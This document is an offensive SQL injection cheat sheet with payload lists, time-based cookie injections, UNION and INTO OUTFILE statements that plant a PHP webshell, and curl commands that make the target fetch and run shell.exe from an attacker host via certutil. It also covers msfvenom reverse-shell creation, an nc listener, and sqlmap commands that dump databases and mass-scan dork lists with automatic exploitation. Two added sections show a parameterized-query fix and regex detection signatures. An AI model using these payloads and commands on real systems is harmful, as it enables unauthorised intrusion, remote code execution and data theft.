mxsqli
===================================
SQL Injection
'
"
;
OR 1=1-- -
' OR 1=1-- -
" OR 1=1-- -
admin' --
' OR 1=1 --
" OR 1=1 --
' OR 1=1;#
" OR 1=1 #
',convert(int,@@version))--
===================================
PHP SQLi Parameter "?"
View Page Source > Ctrl-F "?"
http://192.168.200.5/room.php?cod=1'
An SQL error or a broken page (missing graphic/content) means the parameter is injectable.
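Added example (not from this sheet): a Python/sqlite3 model of the lookup behind room.php?cod=, with the string-concatenated query next to its parameterized replacement, so the "error = injection" probe and the ' OR 1=1-- - tautology from the list above can be reproduced and fixed offline. The table, its rows and all function names are constructed for the demo; nothing here is the original application's code.

```python
import sqlite3

# Constructed sample data standing in for the table behind room.php?cod=...
# restricted=1 rows are meant to be invisible to a public caller.
SAMPLE_ROOMS = [
    (1, "Lobby", 0),
    (2, "Server room", 1),
    (3, "Archive", 1),
]

def setup_db():
    """In-memory SQLite database holding the constructed rooms table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE rooms (cod INTEGER, name TEXT, restricted INTEGER)")
    conn.executemany("INSERT INTO rooms VALUES (?, ?, ?)", SAMPLE_ROOMS)
    return conn

def lookup_room_vulnerable(conn, cod):
    """The pattern the sheet is probing for: the ?cod= value is pasted into the SQL text."""
    sql = "SELECT cod, name FROM rooms WHERE restricted = 0 AND cod = '" + cod + "'"
    return conn.execute(sql).fetchall()

def lookup_room_safe(conn, cod):
    """Hardened form: a bound placeholder keeps the value as data, never as SQL."""
    sql = "SELECT cod, name FROM rooms WHERE restricted = 0 AND cod = ?"
    return conn.execute(sql, (cod,)).fetchall()

def probe(lookup, conn, cod):
    """Mirror the sheet's test: 'error' if the query breaks, otherwise the row count."""
    try:
        return len(lookup(conn, cod))
    except sqlite3.Error:
        return "error"

if __name__ == "__main__":
    conn = setup_db()
    for payload in ("1", "'", "' OR 1=1-- -"):
        print(f"{payload!r:18} vulnerable={probe(lookup_room_vulnerable, conn, payload)!s:6} "
              f"safe={probe(lookup_room_safe, conn, payload)}")
```

With the concatenated query a bare quote produces a syntax error and the tautology returns every row, restricted ones included; with the bound parameter both inputs simply match nothing, which is the behaviour a fixed room.php should show.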
===================================
Burp
If Burp flags a possible SQL injection,
send the request to sqlmap.
===================================
Cookie + Timebased Injection
Cookie: TrackingId=x'||dbms_pipe.receive_message(('a'),10)   (Oracle)
Cookie: TrackingId=x'||WAITFOR DELAY '0:0:10'                (MSSQL)
Cookie: TrackingId=x'||pg_sleep(10)                          (PostgreSQL)
Cookie: TrackingId=x'||sleep(10)                             (MySQL)
Sqlmap Cookie attack
Put a * at the exact point you want sqlmap to test; it then injects only at that marker:
sqlmap -u 'https://site/' --cookie='TrackingId=8g3RMzFVP*;session=8KZ7YvSx'
===================================
PHP Webshell
' AND 1=2 UNION SELECT database(),user(),version() --
' AND 1=2 UNION SELECT database(),user() --
' AND 1=2 UNION SELECT database() --
' AND 1=2 UNION SELECT "/etc/passwd","b","c"--'
' UNION SELECT ("test") INTO OUTFILE 'C:/xampp/htdocs/test.php' -- -'
' UNION SELECT ("<?php echo passthru($_GET['cmd']);") INTO OUTFILE 'C:/xampp/htdocs/cmd.php' -- -'
Webshell
curl "http://192.168.200.5:8080/cmd.php?cmd=whoami"
curl "http://192.168.200.5:8080/cmd.php?cmd=dir"
curl "http://192.168.200.5:8080/cmd.php?cmd=certutil -f -urlcache http://192.168.162.46:80/shell.exe"
curl "http://192.168.200.5:8080/cmd.php?cmd=shell.exe"
Webshell to Reverse
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.162.46 LPORT=53 -f exe -o reverse.exe
python3 -m http.server 80
nc -lvnp 53
===================================
Burp Request in Sqlmap
Burp > GET request > right-click > Copy to file (save as 'burp.req')
sqlmap -r burp.req --batch --dbs
sqlmap -r burp.req --batch -D somedb --tables
sqlmap -r burp.req --batch -D somedb -T sometable --dump --threads 10
===================================
Burp Extensions
SQLiPy
https://github.com/PortSwigger/sqli-py
Install Jython 2.7.2 (an older release is required)
Install SQLiPy from the BApp Store
Start the API
Target > Request > Extensions > Send to SQLiPy
Multiple requests can be queued, but each scan has to be started by hand
Results appear as a Finding under "Issues"
CO2 extension
Helps build sqlmap command lines
===================================
Auto-Answered
sqlmap -u 'http://site/product?id=1' -p 'id' --batch --random-agent \
  --level=5 --risk=3 --threads 5 --dbs --output-dir="/tmp/" \
  --answer="extending=N,follow=N,keep=N,exploit=Y"
- extending: raise level and risk further.
- follow: follow redirects.
- keep: keep testing after a connection timeout.
- exploit: exploit the target if it turns out to be exploitable.
===================================
Dork List
sqlmap -m dorks.txt --batch --answer="extending=N,follow=N,keep=N,exploit=Y" --level=5 --risk=3 --dbs
cat dorks.txt
http://siteone/include/chart_generator.php?session=1
http://sitetwo/pandora_console/include/whatever?param=555
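Added example (not from this sheet): detection logic, in Python, run over constructed request records that cover the payload families used above: the time-based cookie payloads, the UNION SELECT / INTO OUTFILE statements, the cmd.php fetch via certutil, and the User-Agent sqlmap sends when --random-agent is not used. The record layout, the labels, the sqlmap UA string and the 203.0.113.9 host are all constructed for the demo; in a real deployment the same fields come from the web server or WAF log.

```python
import re
from urllib.parse import unquote_plus

# Constructed request records (path, Cookie header, User-Agent) standing in for log lines.
SAMPLE_REQUESTS = [
    {"path": "/room.php?cod=1", "cookie": "TrackingId=abc", "ua": "Mozilla/5.0"},
    {"path": "/room.php?cod=1%27%20OR%201%3D1--%20-", "cookie": "TrackingId=abc", "ua": "Mozilla/5.0"},
    {"path": "/", "cookie": "TrackingId=x'||pg_sleep(10)--", "ua": "Mozilla/5.0"},
    {"path": "/room.php?cod=1%27%20AND%201%3D2%20UNION%20SELECT%20database()%2Cuser()%20--",
     "cookie": "", "ua": "sqlmap/1.7 (https://sqlmap.org)"},   # constructed default-style sqlmap UA
    {"path": "/cmd.php?cmd=certutil%20-f%20-urlcache%20http://203.0.113.9/shell.exe",
     "cookie": "", "ua": "curl/8.0"},
]

# (pattern, label): one entry per payload family on this sheet.
SIGNATURES = [
    (re.compile(r"\b(sleep|pg_sleep|benchmark)\s*\(", re.I), "time-based"),
    (re.compile(r"\bwaitfor\s+delay\b", re.I), "time-based"),
    (re.compile(r"dbms_pipe\.receive_message", re.I), "time-based"),
    (re.compile(r"\bor\s+1\s*=\s*1\b", re.I), "boolean-tautology"),
    (re.compile(r"\bunion\b.{0,40}\bselect\b", re.I | re.S), "union-based"),
    (re.compile(r"\binto\s+(out|dump)file\b", re.I), "file-write"),
    (re.compile(r"\bcertutil\b.*-urlcache", re.I), "webshell-download"),
]

def decode_fully(value, rounds=3):
    """URL-decode repeatedly (bounded) so double-encoded payloads are matched in plain form."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def scan_request(req):
    """Return the sorted list of labels that fire for one request record."""
    labels = set()
    for field in ("path", "cookie"):
        text = decode_fully(req.get(field, ""))
        for pattern, label in SIGNATURES:
            if pattern.search(text):
                labels.add(label)
    # sqlmap identifies itself in the User-Agent unless --random-agent is set: a weak signal on its own.
    if "sqlmap" in req.get("ua", "").lower():
        labels.add("sqlmap-ua")
    return sorted(labels)

def scan_log(requests):
    """Return (index, labels) for every record that tripped at least one signature."""
    hits = []
    for i, req in enumerate(requests):
        labels = scan_request(req)
        if labels:
            hits.append((i, labels))
    return hits

if __name__ == "__main__":
    for i, labels in scan_log(SAMPLE_REQUESTS):
        print(f"request {i}: {', '.join(labels)} -> {SAMPLE_REQUESTS[i]['path']}")
```

Decode before matching: the payloads on this sheet arrive URL-encoded in the query string but raw in the Cookie header, and a double-encoded variant only shows its SQL after two passes. The User-Agent check is deliberately separate because the sqlmap commands above all use --random-agent, which hides it; the body-level signatures still fire regardless of the agent string.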
===================================
See also: mxweb, mxcurls